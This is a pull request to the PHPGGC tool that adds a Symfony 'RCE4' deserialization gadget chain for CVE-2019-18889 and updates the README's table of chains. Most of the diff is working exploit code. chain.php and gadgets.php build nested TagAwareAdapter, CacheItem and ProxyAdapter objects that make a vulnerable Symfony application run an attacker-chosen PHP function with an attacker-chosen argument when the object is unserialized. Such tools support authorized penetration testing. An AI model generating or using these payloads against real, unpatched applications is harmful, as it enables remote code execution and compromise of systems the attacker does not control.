### PR TITLE
Added Symfony RCE4

### DIFF
--- a/README.md
+++ b/README.md
@@ -20,47 +20,49 @@ $ ./phpggc -l
 Gadget Chains
 -------------
 
-NAME                                      VERSION               TYPE             VECTOR         I    
-CodeIgniter4/RCE1                         4.0.0-beta.1 <= ?     rce              __destruct          
-Doctrine/FW1                              ?                     file_write       __toString     *    
-Drupal7/FD1                               7.0 < ?               file_delete      __destruct     *    
-Drupal7/RCE1                              7.0.8 < ?             rce              __destruct     *    
-Guzzle/FW1                                6.0.0 <= 6.3.3+       file_write       __destruct          
-Guzzle/INFO1                              6.0.0 <= 6.3.2        phpinfo()        __destruct     *    
-Guzzle/RCE1                               6.0.0 <= 6.3.2        rce              __destruct     *    
-Laravel/RCE1                              5.4.27                rce              __destruct          
-Laravel/RCE2                              5.5.39                rce              __destruct          
-Laravel/RCE3                              5.5.39                rce              __destruct     *    
-Laravel/RCE4                              5.5.39                rce              __destruct          
-Laravel/RCE5                              5.8.30                rce              __destruct     *    
-Laravel/RCE6                              5.5.*                 rce              __destruct     *    
-Magento/FW1                               ? <= 1.9.4.0          file_write       __destruct     *    
-Magento/SQLI1                             ? <= 1.9.4.0          sql_injection    __destruct          
-Monolog/RCE1                              1.18 <= 1.23          rce              __destruct          
-Monolog/RCE2                              1.5 <= 1.17           rce              __destruct          
-Phalcon/RCE1                              <= 1.2.2              rce              __wakeup       *    
-Pydio/Guzzle/RCE1                         < 8.2.2               rce              __toString          
-Slim/RCE1                                 3.8.1                 rce              __toString          
-SwiftMailer/FD1                           -5.4.12+, -6.2.1+     file_delete      __destruct          
-SwiftMailer/FW1                           5.1.0 <= 5.4.8        file_write       __toString          
-SwiftMailer/FW2                           6.0.0 <= 6.0.1        file_write       __toString          
-SwiftMailer/FW3                           5.0.1                 file_write       __toString          
-SwiftMailer/FW4                           4.0.0 <= ?            file_write       __destruct          
-Symfony/FW1                               2.5.2                 file_write       DebugImport    *    
-Symfony/FW2                               3.4                   file_write       __destruct          
-Symfony/RCE1                              3.3                   rce              __destruct     *    
-Symfony/RCE2                              2.3.42 < 2.6          rce              __destruct     *    
-Symfony/RCE3                              2.6 <= 2.8.32         rce              __destruct     *    
-ThinkPHP/RCE1                             5.1.x-5.2.x           rce              __destruct     *    
-WordPress/Guzzle/RCE1                     4.0.0 <= 6.4.1+       rce              __toString     *    
-WordPress/Guzzle/RCE2                     4.0.0 <= 6.4.1+       rce              __destruct     *    
-WordPress/P/WooCommerce/RCE1              3.4.0 <= 3.6.2+       rce              __destruct     *    
-WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6            rce              __destruct     *    
-Yii/RCE1                                  1.1.20                rce              __wakeup       *    
-ZendFramework/FD1                         ? <= 1.12.20          file_delete      __destruct          
-ZendFramework/RCE1                        ? <= 1.12.20          rce              __destruct     *    
-ZendFramework/RCE2                        1.11.12 <= 1.12.20    rce              __toString     *    
-ZendFramework/RCE3                        2.0.1 <= ?            rce              __destruct     
+NAME                                      VERSION                        TYPE             VECTOR         I
+CodeIgniter4/RCE1                         4.0.0-beta.1 <= ?              rce              __destruct
+Doctrine/FW1                              ?                              file_write       __toString     *
+Drupal7/FD1                               7.0 < ?                        file_delete      __destruct     *
+Drupal7/RCE1                              7.0.8 < ?                      rce              __destruct     *
+Guzzle/FW1                                6.0.0 <= 6.3.3+                file_write       __destruct
+Guzzle/INFO1                              6.0.0 <= 6.3.2                 phpinfo()        __destruct     *
+Guzzle/RCE1                               6.0.0 <= 6.3.2                 rce              __destruct     *
+Laravel/RCE1                              5.4.27                         rce              __destruct
+Laravel/RCE2                              5.5.39                         rce              __destruct
+Laravel/RCE3                              5.5.39                         rce              __destruct     *
+Laravel/RCE4                              5.5.39                         rce              __destruct
+Laravel/RCE5                              5.8.30                         rce              __destruct     *
+Laravel/RCE6                              5.5.*                          rce              __destruct     *
+Magento/FW1                               ? <= 1.9.4.0                   file_write       __destruct     *
+Magento/SQLI1                             ? <= 1.9.4.0                   sql_injection    __destruct
+Monolog/RCE1                              1.18 <= 1.23                   rce              __destruct
+Monolog/RCE2                              1.5 <= 1.17                    rce              __destruct
+Phalcon/RCE1                              <= 1.2.2                       rce              __wakeup       *
+Pydio/Guzzle/RCE1                         < 8.2.2                        rce              __toString
+Slim/RCE1                                 3.8.1                          rce              __toString
+SwiftMailer/FD1                           -5.4.12+, -6.2.1+              file_delete      __destruct
+SwiftMailer/FW1                           5.1.0 <= 5.4.8                 file_write       __toString
+SwiftMailer/FW2                           6.0.0 <= 6.0.1                 file_write       __toString
+SwiftMailer/FW3                           5.0.1                          file_write       __toString
+SwiftMailer/FW4                           4.0.0 <= ?                     file_write       __destruct
+Symfony/FW1                               2.5.2                          file_write       DebugImport    *
+Symfony/FW2                               3.4                            file_write       __destruct
+Symfony/RCE1                              3.3                            rce              __destruct     *
+Symfony/RCE2                              2.3.42 < 2.6                   rce              __destruct     *
+Symfony/RCE3                              2.6 <= 2.8.32                  rce              __destruct     *
+Symfony/RCE4                              3.4.0-34, 4.2.0-11, 4.3.0-7    rce              __destruct     *
+ThinkPHP/RCE1                             5.1.x-5.2.x                    rce              __destruct     *
+WordPress/Guzzle/RCE1                     4.0.0 <= 6.4.1+                rce              __toString     *
+WordPress/Guzzle/RCE2                     4.0.0 <= 6.4.1+                rce              __destruct     *
+WordPress/P/WooCommerce/RCE1              3.4.0 <= 3.6.2+                rce              __destruct     *
+WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6                     rce              __destruct     *
+Yii/RCE1                                  1.1.20                         rce              __wakeup       *
+ZendFramework/FD1                         ? <= 1.12.20                   file_delete      __destruct
+ZendFramework/RCE1                        ? <= 1.12.20                   rce              __destruct     *
+ZendFramework/RCE2                        1.11.12 <= 1.12.20             rce              __toString     *
+ZendFramework/RCE3                        2.0.1 <= ?                     rce              __destruct
+
 ```
 
 Every gadget chain has:

--- a/gadgetchains/Symfony/RCE/4/chain.php
+++ b/gadgetchains/Symfony/RCE/4/chain.php
@@ -1,0 +1,27 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE4 extends \PHPGGC\GadgetChain\RCE
+{
+    public static $version = '3.4.0-34, 4.2.0-11, 4.3.0-7';
+    public static $vector = '__destruct';
+    public static $author = 'wisdomtree';
+    public static $informations = 'Execute $function with $parameter (CVE-2019-18889)';
+    public static $parameters = [
+        'function',
+        'parameter'
+    ];
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Symfony\Component\Cache\Adapter\TagAwareAdapter(array(
+               new \Symfony\Component\Cache\CacheItem(1, $parameter)),
+               new \Symfony\Component\Cache\Adapter\ProxyAdapter(1 , $function)); 
+    }
+}
+
+?>

--- a/gadgetchains/Symfony/RCE/4/gadgets.php
+++ b/gadgetchains/Symfony/RCE/4/gadgets.php
@@ -1,0 +1,42 @@
+<?php
+
+namespace Symfony\Component\Cache { 
+
+    final class CacheItem 
+    { 
+        protected $poolHash ; 
+        protected $innerItem; 
+        public function __construct($poolHash, $parameter) 
+        { 
+            $this-> poolHash = $poolHash; 
+            $this-> innerItem = $parameter; 
+        } 
+    } 
+} 
+
+namespace Symfony\Component\Cache\Adapter { 
+
+    class ProxyAdapter 
+    { 
+        private $poolHash ; 
+        private $setInnerItem; 
+        public function __construct($poolHash, $function) 
+        { 
+            $this-> poolHash = $poolHash; 
+            $this-> setInnerItem = $function; 
+        } 
+    } 
+
+    class TagAwareAdapter 
+    { 
+        private $deferred = []; 
+        private $pool; 
+        public function __construct($deferred, $pool) 
+        { 
+            $this-> deferred = $deferred; 
+            $this-> pool = $pool; 
+        } 
+    } 
+} 
+
+?>


### PR DESCRIPTION
Chain for Symfony:
* `3.4.0 <= 3.4.34`
* `4.2.0 <= 4.2.11`
* `4.3.0 <= 4.3.7`

Bug was originally found by `wisdomtree`, fixed by `Nicolas Grekas` on Symfony `3.4.35`, `4.2.12` and `4.3.8`, and referenced as `CVE-2019-18889`.

References:
* https://symfony.com/blog/cve-2019-18889-forbid-serializing-abstractadapter-and-tagawareadapter-instances
* https://hachp1.github.io/posts/Web%E5%AE%89%E5%85%A8/20190906-laravel_pop1.html